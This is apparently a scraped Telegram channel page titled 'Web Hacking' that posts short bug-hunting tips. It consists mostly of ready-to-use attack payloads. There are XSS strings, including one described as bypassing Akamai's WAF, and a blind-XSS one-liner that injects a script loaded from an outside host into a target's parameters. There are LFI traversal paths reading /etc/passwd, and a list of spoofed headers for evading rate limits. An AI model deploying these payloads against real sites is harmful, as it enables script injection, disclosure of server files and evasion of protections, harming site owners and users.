Web Hacking
2.12K subscribers
52 photos
6 files
37 links
Download Telegram
A nice way to store the payload

"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
A payload to bypass Akamai WAF

<A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
๐Ÿ‘4๐Ÿ‘Œ1
Another one


"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>
๐Ÿ‘1
One Liner To Find Blind XSS
Blind XSS in Parameters

subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters
Testing Authentication Flaws in Web Application
๐Ÿ‘1
Some filter bypass payload list while hunting for LFi vulnerability


โ†’index.php?page=....//....//etc/passwd
โ†’index.php?page=..///////..////..//////etc/passwd
โ†’index.php?page=/var/www/../../etc/passwd
๐Ÿ‘3
Remote File Inclusion (RFI)
๐Ÿ‘5
Rate limit bypass using some custom headers:

X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP
โคโ€๐Ÿ”ฅ8๐Ÿ‘1๐Ÿ‘Œ1๐Ÿณ1
403 bypass techniques
๐Ÿ‘5
Bypassing Rate Limit Protection
๐Ÿ‘5๐Ÿคฎ1